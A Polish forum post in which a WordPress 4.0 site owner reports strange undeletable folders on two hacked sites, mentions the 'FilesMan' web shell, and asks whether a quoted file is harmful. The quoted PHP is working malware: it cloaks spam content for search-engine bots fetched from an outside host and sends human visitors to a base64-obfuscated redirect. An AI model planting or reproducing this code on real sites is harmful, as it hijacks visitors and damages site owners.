Cześć.
Zalogowałem się dziś na FTP dwóch stron, które są oparte na Wordpress. Zobaczyłem tam wiele dziwnych katalogów oraz dziwnych plików. Oto przykładowa treść jednego z plików.
<?php
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
$isbot = 1;
}
if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
$isbot = 1;
}
if ($isbot)
{
$url = "http://20150216_in2-016.rmentaj.in/uvbquhzw";
$options = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en\r\n" .
"Cookie: foo=bar\r\n" . // check function.stream-context-create on php.net
"User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n" // i.e. An iPad
)
);
$context = stream_context_create($options);
$html = file_get_contents($url, false, $context);
echo $html;
}
if(!@$isbot)
{
$rd = "http://20150216_in2-016.rmentaj.in/uvbquhzw";
$rd = str_replace("http://", "", $rd);
$domain = $_SERVER['HTTP_HOST'];
$b=base64_decode('cy8/cT0=');$a=base64_decode('ZGpsaW5rLmlu');$c=base64_decode('aHR0cDovLw==');$d=base64_decode('aHR0cDovL3RybGlua2dvLmluL2FuZHJvaWQvYXBwcy8/YXBwPW1vYmlsZQ==');$a=''; header('Location: '.$c.base64_decode('Mzcu').$a.'1'.base64_decode('LjIxNC4xMjMvYXBw').$b.'Churithar+anty'.base64_decode('JnJkPQ==').$rd.base64_decode('JmRvbWFpbj0=').$domain);
exit;
}
?>
Katalogi nie chcą się usunąć, w którymś z plików jako "scriptname" było podane "FilesMan".
Wordpress w wersji 4.0. Czy ktoś spotkał się z takim problemem ?
Czy to szkodliwe ?
Jak się zabezpieczyć przed tym czymś ?